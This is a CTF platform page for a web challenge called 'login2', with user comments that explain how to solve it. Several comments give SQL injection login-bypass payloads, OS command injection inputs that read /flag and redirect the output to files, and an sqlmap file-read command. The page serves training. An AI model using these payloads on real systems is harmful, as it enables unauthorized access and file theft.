login2WEB 未解决

分数: 40 金币: 6
题目作者: 未知
一  血: ShawRoot
一血奖励: 5金币
解  决: 2125
提  示: 命令执行
描  述:
login2
评论
DoubleUUU 5月前

一顿sqlmap半小时,deepseek秒给payload:username = ' UNION SELECT "admin","202cb962ac59075b964b07152d234b70" -- &password = 123

回复 0

liuguowang75 5月前

登陆后,在检验窗口中输入:123 | ls / > a.txt ,可以看到用户目录中所有文件,

回复 0

sunset2004 7月前

username=admin' union select 1,md5(123)#&password=123,union生成临时表将md5后的123到表里,然后密码输入123即可绕过。RCE直接通过重定向符号即可,将无回显的结果保存到a.txt里即可,123 | cat ../../../../flag > a.txt

回复 3

Zhou_re-pwn 7月前

没太看懂这题出的啥意思,进入监控系统后,和wp的绕过一模一样,结果回显没有显示

回复 0

Yoruko39 8月前

sql注入+RCE,但主要是代码审计,进入命令界面后,发现可以用;截断执行命令,但无回显。 可以用重定向符,将执行结果输出到文件中,再访问/a.txt即可,例如可以;cat * > a.txt,此时可以看到当前目录下所有文件,审计发现flag在一个宏变量$FLAG里,echo到文件即可

回复 0

toonavy 9月前

进程监控系统 输入需要检测的服务 ,退币!!!

回复 0

Zhumeng 9月前

这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag

回复 0

Zhumeng 9月前

这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag

回复 2

雾島风起時 10月前

好啊好啊,坑我3次了,每次一测试环境就崩,啥东西呀

回复 1
lunarbyside 3月前

原来不是我一个人吗?我测试到一半就加载不出来了。

回复 0

cccczz 10月前

sqlmap -r xxx.txt --batch --file-read=/flag

回复 3

WriteUp

image
harry

6 金币

评分(8)

解题动态

yiwyiw 攻破了该题 4小时前
weiyouzhunze 攻破了该题 4小时前
TwangT 攻破了该题 16小时前
walkerming 攻破了该题 1天前
yyt030 攻破了该题 1天前
爱吃馒头 攻破了该题 1天前
desireart 攻破了该题 1天前
zcgzcx1234 攻破了该题 1天前
暗A166668 攻破了该题 2天前
geekhzy 攻破了该题 2天前
吴王饭差 攻破了该题 2天前
欲语泪先流 攻破了该题 2天前
wywsssf 攻破了该题 2天前
白六真的6 攻破了该题 3天前
alizee 攻破了该题 3天前
5326 攻破了该题 3天前
llq135136 攻破了该题 3天前
18469110745 攻破了该题 3天前
泡泡鱼 攻破了该题 4天前
凌晨3点的阳光 攻破了该题 4天前
问题反馈